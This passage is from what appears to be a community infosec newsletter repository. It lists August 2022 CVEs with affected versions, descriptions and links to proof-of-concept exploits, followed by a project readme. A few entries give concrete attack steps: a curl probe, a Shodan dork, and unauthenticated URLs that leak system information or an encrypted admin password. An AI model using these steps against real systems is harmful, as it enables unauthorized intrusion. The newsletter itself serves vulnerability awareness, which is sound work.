This script can also be used against the LiteSpeed server.\n     \n - [CVE-2021-38297 Analysis](https://jfrog.com/blog/cve-2021-38297-analysis-of-a-go-web-assembly-vulnerability/)\n           \n      - Target: **Golang (“Go”) programming language**\n      - Patched : fixed versions (1.16.9, 1.17.2 or later).\n      - Description/Issue : @jfrog has elaborated on the prerequisites for exploiting the Go vulnerability, which allows an attacker to override an entire Wasm (WebAssembly) module with their own malicious code and achieve WebAssembly code execution, and explores mitigation strategies for developers.\n \n- [CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n      \n     - Product: **ZOHO**\n     - Description/Issue : Zoho Internal Hostname Disclosure Vulnerability\n                            \n                            Step 1: curl -ILk https://IP:port/themes\n                            Step 2: Read the HTTP redirect response and analyze the Location HTTP response header.\n                            BONUS #Shodan : title:\"ManageEngine Desktop Central 10\"\n\n- [CVE-2022-2639 PoC](https://drive.google.com/drive/folders/1f5YzKy_NChwlbYqHp-7Ih3RTSTBq9Ns6?usp=sharing)\n           \n     - Target: **Linux kernel openvswitch local privilege escalation.**\n     - Tested on : 5.13, 5.4, 4.18.\n     - Description/Issue : Uses the pipe primitive to exploit CVE-2022-2639, so no KASLR leak nor SMAP/SMEP/KPTI bypass is needed.\n\n- [CVE-2022-31814 Analysis](https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/)\n      \n     - Target/Product: **pfBlockerNG plugin**\n     - Affected Version : <= 2.1.4_26\n     - Description/Issue : IHTeam undertook an independent security assessment of pfSense’s pfBlockerNG plugin version 2.1.4_26 and identified Unauthenticated Remote Command Execution as root (CVE-2022-31814).\n      \n   \n - [CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371)\n           \n      - 
Target/Product: **Oracle Fusion Middleware's Oracle WebLogic Server product**\n      - Affected Version : 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0\n      - Description/Issue : The Oracle Fusion Middleware's Oracle WebLogic Server product (Web Container component) is vulnerable to local file inclusion. An easily exploited vulnerability could allow an unauthenticated attacker with HTTP network access to compromise Oracle WebLogic Server. A successful attack on this vulnerability provides attackers with complete access to Oracle WebLogic Server's whole data store or unrestricted access to sensitive data.\n\n - [CVE-2022-1388_PoC](https://github.com/alt3kx/CVE-2022-1388_PoC)\n           \n      - Target: **F5 BIG-IP RCE exploitation**\n      - Affected Version : On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication.\n      - Description/Issue : F5 BIG-IP RCE exploitation (CVE-2022-1388)\n\n - [CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174)\n           \n      - Target/Product: **[Powertek PDUs](https://www.powertekpdus.com/)**\n      - Affected Version : Powertek PDU 3.30.30\n      - Description/Issue : Powertek PDUs are high quality custom rack power distribution units from Powertek Corporation. There is a security vulnerability in Powertek PDU versions prior to 3.30.30. The vulnerability stems from the fact that the power distribution unit allows remote authorization to be bypassed in the web interface. 
The vulnerability can be exploited by an attacker to obtain the username and password in clear text.\n           \n - [CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637)\n           \n      - Target/Product : **Open Web Analytics (OWA)**\n      - Affected Version : <1.7.4.\n      - Description/Issue : Exploit for the Unauthenticated RCE in Open Web Analytics (OWA) <1.7.4. This work is based on https://devel0pment.de/?p=2494.\n\n\n - [CVE-2022-1802 + CVE-2022-1529 + CVE-2022-2200](https://github.com/mistymntncop/CVE-2022-1802)\n           \n      - Tested: **Firefox 100.0.1**\n      - Description/Issue : Firefox 100.0.1 RCE via Object prototype pollution: attackers could set undesired attributes on a JavaScript object, leading to privileged code execution.\n\n - [CVE-2022-35406 Writeups](https://medium.com/@mr.vrushabh/discovery-of-cve-2022-35406-303f4bca2742)\n      - Description/Issue : @mr.vrushabh found CVE-2022-35406 at PortSwigger Web Security. This was a bug in Repeater/Intruder whereby a meta redirect would be followed when a user clicked the follow redirection button, regardless of the content type or content disposition headers used on the target web site. This could disclose the referrer header. It was considered a low severity issue because the attack scenario involved multiple unlikely steps that required user interaction. \n\n - In week 35 of the Advisory Week Newsletter you'll see updates on [Security fixes for Apple, Microsoft, Github, Red Hat, Ubuntu, Mozilla and the National Cyber Awareness System](https://advisoryweek.com/) \n\n</details>\n---\n<details>\n<summary><b> \n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 23rd - 30th August 2022\n\n \n      CVE POC exploit : CVE-2022-32250, CVE-2022-37042, CVE-2022-38766, CVE-2022-23779, CVE-2022-32250-Linux-Kernel-LPE, \n                        CVE-2022-22715, CVE-2022-37153, CVE-2022-2884, CVE-2022-2586 and CVE-2022-LPE-UAF.\n      \n      CVE Analysis :    CVE-2022-20233, Multiple CVE in TENDA, CVE-2022-24787, CVE-2022-33318, CVE-2022-2884, CVE-2022-26377, \n                        CVE-2020-2733 and CVE-2022-30129. \n\n</b></summary> \n \n - [CVE-2022-32250 Exploit](https://github.com/theori-io/CVE-2022-32250-exploit)\n    - Target: **Linux-Kernel**\n    - Affected Version: Linux, before commit 520778042ccca019f3ffa136dd0ca565c486cedd (26 May, 2022) & Ubuntu <= 22.04 before security patch.\n    \n    - Description : CVE-2022-32250 allows a local user to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free (UAF). \n\n- [N-day exploit for CVE-2022-2586 - Analysis](https://www.openwall.com/lists/oss-security/2022/08/29/5)\n   - Target/Product: **Linux Kernel nft_object UAF**\n   - Affected Version : 3.16-rc1\n   \n   - Description : The vulnerability is a Use-After-Free (UAF) in nf_tables that makes it possible to escalate privileges from any user to root, and it has been present since kernel version v3.16-rc1. 
To exploit this bug we need to enter a new network namespace to obtain `CAP_NET_ADMIN` (i.e. unprivileged user namespaces must be enabled, which is the case on most Linux distributions nowadays).\n\n - [CVE-2022-22715 POC](https://github.com/k0keoyo/my_vulnerabilities/tree/master/CVE-2022-22715)\n    - Target: **Windows OS**\n    - Description : In February 2022, Microsoft patched the vulnerability k0keoyo used in TianfuCup 2021 for escaping the Adobe Reader sandbox, assigned CVE-2022-22715. The vulnerability had existed in the Named Pipe File System for nearly 10 years, since the AppContainer was born. We called it \"Windows Dirty Pipe\".\n    - Root Cause : The vulnerability existed in the Named Pipe File System Driver - npfs.sys, and the affected function is npfs!NpTranslateContainerLocalAlias. When NtCreateFile is invoked with a named pipe path, it hits the IRP_MJ_CREATE major function of npfs, which calls NpFsdCreate.\n\n - [CVE-2022-20233 Analysis](https://blog.quarkslab.com/attacking-titan-m-with-only-one-byte.html)\n    - Product: **Titan M - A security chip introduced by Google in their Pixel smartphones, starting from the Pixel 3.**\n    - Patched : Pixel Security update of June 2022.\n    \n    - Description/Issue : On 2022-08-11, Google awarded Quarkslab's engineers Damiano Melotti and Maxime Rossi Bellom $75,000, and they presented their Titan M vulnerability research project at the Black Hat USA 2022 Briefings in Las Vegas. You can also check out this week's Tools section for finding vulnerabilities on Titan M.\n\n - [Multiple CVE in TENDA](https://github.com/Darry-lang1/vuln/tree/main/Tenda/AC1206/4)\n    - Product: **Tenda AC1206 Router**\n    - Affected Version : V15.03.06.23\n    \n    - Description/Issue : Recently, multiple CVEs have been assigned to the Tenda AC1206. 
CVEs that you should check out: CVE-2022-37798, CVE-2022-37799, CVE-2022-37800, CVE-2022-37801, CVE-2022-37802, CVE-2022-37803, CVE-2022-37804, CVE-2022-37805, CVE-2022-37806 & CVE-2022-37807.\n\n - [CVE-2022-24787 Report analysis](https://securitylab.github.com/advisories/GHSL-2022-001_Orckestra_C1_CMS/)\n    - Target/Product: **Orckestra C1 CMS - Content Management System that scales out in the cloud.**\n    - Version: v6.11\n    \n    - Description : @JarLob (Jaroslav Lobačevski) reported an issue highlighting \"Deserialization of untrusted data (GHSL-2022-001) allows for Server Side Request Forgery (SSRF) or arbitrary file truncation.\"\n \n  - [CVE-2022-38766 POC]\n    - Target/Product: **Renault 2021 ZOE electric car**\n    \n    - Description/Issue : This vulnerability raised the question of whether ZOE electric vehicles are safe from RF hacking. For this reason, the actual ZOE vehicle released this year was targeted and attacked. A study was also conducted on how this attack bypasses rolling codes, a defense technique against RF hacking, and a lot of thought was needed about the handling method in case the car breaks down.\n \n - [CVE-2022-37042 POC Exploit](https://github.com/aels/CVE-2022-37042)\n    - Target: **Zimbra**\n    - Description : Zimbra CVE-2022-37042 Nuclei weaponized template; shell path: /public/formatter.jsp\n    \n  - [CVE-2022-23779 Proof-of-Concept Exploit](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n    - Target: **ZOHO**\n    - Description : Internal Hostname Disclosure Vulnerability\n\n - [CVE-2022-33318 - Remote Code Execution in ICONICS Genesis64](https://github.com/0vercl0k/paracosme)\n    - Target: **Genesis64 suite**\n    - Version: 10.97.1\n    \n    - Description : Paracosme (Remote Code Execution in ICONICS Genesis64 exploit) was demonstrated during the Pwn2Own 2022 Miami contest that took place at the S4x22 Conference. 
Paracosme exploits a use-after-free issue found in the GenBroker64 process to achieve remote code execution on a Windows 21H2 x64 system. At a high level, the GenBroker64 process listens on TCP port 38080 and is able to deserialize various packets after a handshake has been done with a client. The issue I found is in the code that handles reading a VARIANT from the network socket. Basically a variant is a type and a value. The function seems well-written at first sight, and takes efforts to only unpack certain types. \n    \n\n - [CVE-2022-2884](https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/)\n    - Target: **GitLab**\n    - Version: 15.3.1, 15.2.3, 15.1.5\n    \n    - Description : There is a critical vulnerability with the identifier CVE-2022-2884 and a score of 9.9 in versions 11.3.4 to 15.1.4 and between 15.2 and 15.2.3, as well as 15.3 community and enterprise versions, which allows an attacker to execute code remotely. This vulnerability occurs in GitHub import.\n\n\n - [CVE - 2022-LPE-UAF](https://github.com/greek0x0/2022-LPE-UAF)\n    - Target: **Linux kernel**\n    \n    - Description : Security researchers discovered 3 vulnerabilities in the Linux kernel that could allow a local attacker to elevate privileges and potentially execute malicious code. 
[Paper on DirtyCred by Zhenpeng Lin](https://zplin.me/papers/DirtyCred-Zhenpeng.pdf)\n\n\n - [CVE-2022-26377 Analysis](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/)\n    - Target: **Apache HTTPd**\n    - Title : apache-httpd-ajp-request-smuggling\n    \n    - Description : This article introduces a new attack method and idea for AJP, which can be used against applications such as Apache HTTPd proxy_ajp. The attack surface covers the reverse proxy for Tomcat AJP and self-developed AJP reverse proxies, and horizontal expansion to FastCGI and other protocols can also be attempted (though no other protocols have been explored yet). \n\n - [CVE-2020-2733 Analysis](https://redrays.io/cve-2020-2733-jd-edwards/)\n    - Product: **Oracle JD Edwards EnterpriseOne Tools**\n    - Affected Version : < 9.2\n    \n    - Description/Issue : The vulnerability was discovered in the Oracle JD Edwards Management portal. To reproduce the vulnerability, you need to open (without authentication) the following [URL](http://JDEdwards:8999/manage/fileDownloader?sec=1). When you open the URL, you can see pseudo-random text on the page: ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB. After analyzing the JD Edwards jar files, the researcher discovered that this pseudo-random data is – THE ENCRYPTED ADMIN PASSWORD!\n\n - [CVE-2022-30129 - Analysis](https://blog.sonarsource.com/securing-developer-tools-argument-injection-in-vscode/)\n    - Target/Product: **Microsoft - Visual Studio Code**\n    - Affected Version : 1.67.1\n    \n    - Description/Issue : Argument Injection in Visual Studio Code : The vulnerability can be used to target developers that have the Visual Studio Code IDE installed. Upon clicking on a malicious link crafted by an attacker, victims are prompted to clone a Git repository in Visual Studio Code. 
\n\n</details>\n--- \n<details>\n<summary><b> \nCVE's that matter Week 03 -> 16th - 22nd Aug 2022 \n</b></summary>\n\n- [CVE-2022-1802 POC Exploit](https://github.com/mistymntncop/CVE-2022-1802)\n    - Target: **Amazon-Linux 2 : thunderbird Package**\n    - Version Affected: <0:91.9.1-1.amzn2.0.1 \n    - Description : The Mozilla Foundation Security Advisory describes this flaw as:\n     An attacker could have sent a message to the parent process where the contents were used to double-index into a JavaScript object, leading to prototype pollution and ultimately attacker-controlled JavaScript executing in the privileged parent process. (CVE-2022-1529).\n\n- [CVE-2022-35742](https://blog.78researchlab.com/b9c80d00-d935-43b1-8805-969000df301d)\n    - Target: **Windows Outlook**\n    - Patched in August 2022\n    - Description : Denial of service in Outlook, where an attacker can trigger the vulnerability by sending a crafted email; the vulnerability occurs during MIME property parsing.\n\n - [CVE-2021-43811 POC](https://github.com/s-index/CVE-2021-43811)\n    - Target: **awslabs/sockeye**\n    - Version: < 2.3.24 \n    - Description : Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. 
The issue is fixed in version 2.3.24.\n\n- [CVE-2020-6369 Patch bypass](https://redrays.io/cve-2020-6369-patch-bypass/)\n    - Target: **CA Introscope Enterprise Manager**\n    - Version Affected :\n                        WILY_INTRO_ENTERPRISE 9.7\n                        WILY_INTRO_ENTERPRISE 10.1\n                        WILY_INTRO_ENTERPRISE 10.5\n                        WILY_INTRO_ENTERPRISE 10.7\n    - Description : CA Introscope Enterprise Manager releases 10.7.0.306 or lower allow unauthenticated attackers to bypass authentication if the administrator has not changed the default passwords for Admin and Guest. This may impact the confidentiality of the service.\n\n - [CVE-2022-36966]\n    - Target: **Orion platform**\n    - Description : CVE-2022-36966 has been assigned as the Zero-Day for the escalation of privilege in the Orion platform. The exploit requires internal + initial access. Details will be shared as SolarWinds provides official feedback. The vulnerability was identified by researcher 'Asim Khan'.\n\n\n - [1day to 0day (CVE-2022-30024) on TP-Link TL-WR841N](https://blog.viettelcybersecurity.com/1day-to-0day-on-tl-link-tl-wr841n/)\n    - Target: **TP-Link TL-WR841N devices**\n    - Description : Vulnerabilities on TP-Link TL-WR841N devices: CVE-2020-8423 (data parsing), CVE-2022-24355 (file extension handling) & CVE-2022-30024 (assignment data)\n\n\n - [CVE-2022-27255 POC](https://github.com/infobyte/cve-2022-27255/tree/main/exploits_nexxt)\n    - Target: **Realtek eCos SDK SIP ALG buffer overflow**\n    - Vulnerable Devices : \n               \n               Nexxt Nebula 300 Plus\n               Tenda F6 V5.0\n               Tenda F3 V3\n               Tenda F9 V2.0\n               Tenda AC5 V3.0\n               Tenda AC6 V5.0\n               Tenda AC7 V4.0\n               Tenda A9 V3\n               Tenda AC8 V2.0\n               Tenda AC10 V3\n               Tenda AC11 V2.0\n               Tenda FH456 V2.0\n               Zyxel NBG6615 V1.00\n 
              Intelbras RF 301K V1.1.15\n               Multilaser AC1200 RE018\n               iBall 300M-MIMO (iB-WRB303N)\n               Brostrend AC1200 extender\n               MT-Link MT-WR850N\n               MT-Link MT-WR950N\n               Everest EWR-301\n               D-Link DIR-822 h/w version B\n               Speedefy K4\n               Ultra-Link Wireless N300 Universal Range Extender\n               Keo KLR 301\n               QPCOM QP-WR347N\n               NEXT 504N\n               Nisuta NS-WIR303N (probably V2)\n               Rockspace AC2100 Dual Band Wi-Fi Range Extender\n               KNUP KP-R04\n               Hikvision DS-3WR12-E\n\n    - Description : PoC and exploit code. The PoC should work on every affected router; however, the exploit code is specific to the Nexxt Nebula 300 Plus router. For more - https://github.com/infobyte/cve-2022-27255\n\n\n - [CVE-2022-37393 Technical Analysis](https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis)\n    - Target: **Zimbra Collaboration Suite**\n    - Description : We are not aware of active exploitation of CVE-2022-37393 at this time, but it could be very difficult to detect successful exploitation because it grants root access.\n\n\n - [CVE-2022-21881 POC](https://github.com/theabysslabs/CVE-2022-21881)\n    - Target: **TianfuCup 2021**\n    - Description : POC of CVE-2022-21881, exploited at TianfuCup 2021 to escape the Chrome Sandbox \n\n - [CVE-2022-29805 Analysis](https://www.whiteoaksecurity.com/blog/fishbowl-disclosure-cve-2022-29805/)\n    - Target: **Fishbowl**\n    - Version: <2022.4.1.\n    - Description : White Oak Security discovered an instance of Fishbowl Inventory that was vulnerable to a Java deserialization vulnerability, resulting in unauthenticated remote code execution. 
\n        \n - [CVE-2022-37042 Zimbra Authentication Bypass](https://github.com/projectdiscovery/nuclei-templates/pull/5134/files)\n    - Target: **Zimbra**\n    - Description : Nuclei Zimbra: Release of CVE-2022-37042 Zimbra Authentication Bypass Causing RCE Non-Destructive Vulnerability Detection Template.\n \n</details>\n---\n<details>\n<summary><b> \nCVE's that matter Week 02 -> 9 - 16 Aug 2022\n</b></summary>\n\n - [CVE-2022-27255](https://github.com/infobyte/cve-2022-27255)\n    - Target: **Realtek eCos SDK SIP ALG buffer overflow.**\n    - Description : This repository contains the materials for the talk \"Exploring the hidden attack surface of OEM IoT devices: pwning thousands of routers with a vulnerability in Realtek’s SDK for eCos OS.\", which was presented at DEFCON30.\n\n  - [CVE-2022-30216]()\n    - Target: **Windows Server service**\n    - Version: Windows 11/Server 2022 machine.\n    - Description : PoC of the srvsvc auth coerce vulnerability [(CVE-2022-30216) : Authentication coercion of the Windows “Server” service.](https://www.akamai.com/blog/security/authentication-coercion-windows-server-service)\n\n\n  - [CVE-2022-36446 POC](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE)\n    - Target: **Webmin**\n    - Version: < 1.997. \n    - Description : A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin.\n\n - [DashOverride POC]()\n    - Target: **VMware vRealize Operations Manager**\n    - Version : <= 8.6.3.19682901. \n    - Description : This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROPS) that impacts versions <= 8.6.3.19682901. 
\n                    This exploit chains three vulnerabilities that have been patched.\n                    CVE-2022-31675 - MainPortalFilter ui Authentication Bypass\n                    CVE-2022-31674 - SupportLogAction Information Disclosure\n                    CVE-2022-31672 - generateSupportBundle VCOPS_BASE Privilege Escalation\n\n - [CVE-2021-43908 Analysis](https://blog.electrovolt.io/posts/vscode-rce/)\n    - Target: **Visual Studio Code**\n    - Description: Visual Studio Code - Remote Code Execution in Restricted Mode (CVE-2021-43908)\n \n - [CVE-2022-31101 POC](https://github.com/karthikuj/CVE-2022-31101)\n    - Target: **PrestaShop** is the universal open-source software platform to build your e-commerce solution. \n    - Description: Exploit for PrestaShop blockwishlist module 2.1.0 SQLi \n\n - [CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980)\n   - Target: **Apache**\n   - Version: 2.2.4 to 2.7-2\n   - Description: Apache Commons RCE: the url, dns and script keywords can be used to connect to any server.\n\n - Microsoft security updates that matter :\n   - [CVE-2022-34715 POC](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715) - Description: Windows Network File System Remote Code Execution Vulnerability.\n   - [CVE-2022-30133](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30133) - Description: Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (Disable port 1723)\n   - [CVE-2022-34713](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713) - Description: 0-day DogWalk - Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\n\n - [CVE-2020-0796](https://github.com/msuiche/smbaloo)\n    - Target: **Windows ARM64**\n    - Description: A CVE-2020-0796 (aka \"SMBGhost\") exploit for Windows 10 18362 ARM 64-bit (AArch64)\n    \n- [Vulnerabilities in Cisco Small Business 
products](https://pastebin.com/8w2VVXn2)\n   - CVE-2022-20842 \n   - CVE-2022-20827 \n   - CVE-2022-20841\n\n- [Multiple Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software have not been FIXED](https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/)\n   - Cisco ASDM binary packages\n     - CVE-2022-20829 - Not fixed**\n     - None (CVE not assigned yet) - Not fixed\n   - Cisco ASDM (7.17.1.155)\n     - CVE-2022-20651 - Fixed\n   - Cisco ASDM client (fixed in ASDM 7.18.1.150, but Rapid7 has informed Cisco that the issue was in fact not addressed and remains unfixed) \n     - CVE-2021-1585 CSCvw79912 - Not fixed**\n   - Cisco ASDM binary package code execution mechanism to be used with CVE-2022-20829 or CVE-2021-1585\n     - CSCwc21296 - Fixed\n   - Cisco ASA-X with FirePOWER Services \n     - CVE-2022-20828 - Fixed in most maintained versions\n   - Cisco FirePOWER module before 6.6.0\n     - CSCvo79327 - Fixed in most maintained versions\n     - >= 7.0. 
Not fixed on ASA.\n   - Cisco ASA with FirePOWER Services \n      - None - Not fixed\n   - Some Cisco FirePOWER modules\n      - None - Not fixed\n\n </details>\n---\n<details>\n<summary><b> \nCVE's that matter Week 01 -> 2 - 9 Aug 2022\n</b></summary>\n\n - [CVE-2022-36446 Exploit](https://www.exploit-db.com/exploits/50998)\n    - Target: **Webmin**\n    - Version: 1.996\n    - Description: [Remote Code Execution (RCE) Authenticated During Install New Packages.](https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165)\n  \n  - [CVE-2022-2552 Exploit](https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2552)\n    - Target: **WordPress Plugin Duplicator**\n    - Version: <=1.4.7\n    - Description : Unauthenticated System Information Disclosure \n    - #Proof-Of-Concept: 1-System information.\n                         Some system information is obtained using the \"view\" parameter.\n                         http://[PATH]/backups-dup-lite/dup-installer/main.installer.php\n \n  - [**CVE-2022-29582** - io_uring subsystem of the Linux kernel vulnerability](https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/)\n  \n  - [**CVE-2022-35405 Zoho** Password Manager Pro XML-RPC RCE](https://xz-aliyun-com.translate.goog/t/11578?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)\n\n  - [**CVE-2022-1215 - Analysis**](https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak.html)\n    - Target: **libinput library**\n    - Version: < 1.20.0\n    - Description: nday exploit - A format string vulnerability exists in the libinput library, \n    allowing a local attacker to achieve arbitrary code execution in the context of libinput.\n\n- [CVE-2022-34918 LPE POC](https://github.com/veritas501/CVE-2022-34918)\n  - Target: *Linux kernel module* (4 Aug 2022) \n  - Version span: v5.8 ~ v5.19 \n  - Description: netfilter nf_tables local privilege escalation analysis \n  \n - [Multiple CVE's on multiple VMWARE products and a critical (9.8) 
CVE-2022-31656](https://www.vmware.com/security/advisories/VMSA-2022-0021.html)\n   - Target: **VMWARE**\n   - Version: 21.08.0.1, 21.08.0.0\n   - Description: VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.\n  \n- [nex-forms-exploit](https://github.com/ehtec/nex-forms-exploit)\n  - Target: *Wordpress plugin* (2nd August 2022)\n  - Versions: <= 7.9.6\n  - Description: Authenticated SQL injection vulnerability in the \"NEX Forms\" Wordpress plugin.\n \n- [CVE-2022-2185](https://github.com/star-sg/CVE/tree/master/CVE-2022-2185)\n  - Target: **GitLab**\n  - Version: GitLab, affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1\n  - Exploit Written By: [Nguyễn Tiến Giang](https://github.com/testanull)\n\n </details>\n"
  },
  {
    "path": "ResetCybersecuirty/Readme.md",
    "content": "# WEEKLY INFOSEC UPDATE : v0.7\n \n- An initiative by [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER)\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n\n\n Hey Hackers, Thankyou for visiting Weekly Infosec Update.\n\n![WeeklyInfosecUpdate_v0.7](https://user-images.githubusercontent.com/25515871/192681278-0cfb1d6f-c1a4-4e62-85f1-21f41724a4a0.png)\n\n<details>\n<summary><b>Preview</b></summary>\n\n  - 1. CVE : poc exploit and analysis.\n       - CVE Week → Day0* — Day0* Month 2022  \n         - Security Patched\n         - CVE: analysis & poc\n         - CVE poc \n    \n  - 2. Secuirty & Researchers: AppSec, Red team, Blue team, threat intelligence, Malware, Ransomware etc  \n       - Infosec Business, funded and Market\n       - Web Security and android security\n       - Cloud Security\n       - Blue/Red/Threat Intelligence Team\n   \n  - 3. News\n         - DataBreach & Black Hat Hacker\n         - Top 5 in Infosec\n         - Twitter threads & Tips.\n         - Hiring & Jobs\n         - Event Recap.\n            - Conferences\n            - Webinars and videos\n            - Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎:\n        \n  - 4. Bug Bounty : reports, Write-ups and Resources.\n       - Hackerone/Bugcrowd REPORT\n       - Bug bounty writeups, tips & resources \n        \n  - 5. Tools, framework, RAT, Ransomware and malware\n        - SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting : * Tool\n        - Cloud Security : * Tool\n        - Blue/Red Team/Threat intelligence : * Tool\n        - Reverse engineering & OSINT : * Tool\n        - IOT, OS & Hardware : * Tool \n        \n  - 6. 
How to get involved in contribution, and contributors.\n        - Community Engagement Partners.\n        - Team/contributors of #WeeklyInfosecUpdate.\n        - Resources for Weekly Infosec Update.\n       \n  - 7. Wrapping Up. :)\n\n</details>\n\n---\n\n# InfoSec community infused Weekly Update :\n| ID | Weekly Issue Number | Recap Week | Issued Date | \n|---|---|---|---|\n| 11 | [Weekly Issue 12](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_11.md) | 19th October 2022 - 25th October 2022 | 26th October 2022 | \n| 10 | [Weekly Issue 11](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_10.md) | 12 October 2022 - 18 October 2022 | 19 October 2022 | \n| 09 | [Weekly Issue 10](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_09.md) | 28 Sept 2022 - 11 October 2022 | 12 October 2022 | \n| 09 | [Weekly Issue 09](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_08.md) | 21 Sept 2022 - 27 Sept 2022 | 28 Sept 2022 |  \n| 08 | [Weekly Issue 08](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_07.md) | 14 Sept 2022 - 20 Sept 2022 | 21 Sept 2022 |  \n| 07 | [Weekly Issue 07](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_06.md) | 07 Sept 2022 - 13 Sept 2022 | 14 Sept 2022 |  \n| 06 | [Weekly Issue 06](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_05.md) | 31st August - 06 September 2022 | 07 
September 2022 |\n| 05 | [Weekly Issue 05](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_04.md) | 23rd August - 30th August 2022 | 31st August 2022 |\n| 04 | [Weekly Issue 04](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_03.md) | 16th August - 22nd August 2022 | 23rd August 2022 |\n| 03 | [Weekly Issue 03](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_02.md) | 9th August - 15th August 2022 | 16th August 2022 |\n| 02 | [Weekly Issue 02](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_01.md) | 2nd August - 8th August 2022 | 9th August 2022 |\n| 01 | [Weekly Issue 01](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_00.md) | 25th July - 1st August 2022 | 02 August 2022 |\n\n  \n#### Give a STAR if you appreciate our work or if Weekly InfoSec Update provides value to you.\n    \n## In the future,\n\n   1. Weekly Infosec Update\n   \n     • Shifting to a website with a freemium subscription model for #WeeklyInfosecUpdate.\n     • Add more categories such as Daily, Infosec Weekly, Developers Weekly and Monthly Recap.\n     • Newsletter service for organizations.\n    \n   2. Create a public knowledge DB\n   \n     • Make it a wiki\n     • Crowdsource the content.\n        \n<details>\n<summary><b>Preview</b></summary>\n\n Future plans detailed:\n  1. The final version of Weekly Infosec Update will be a website that will contain categorised content for professionals and beginners. 
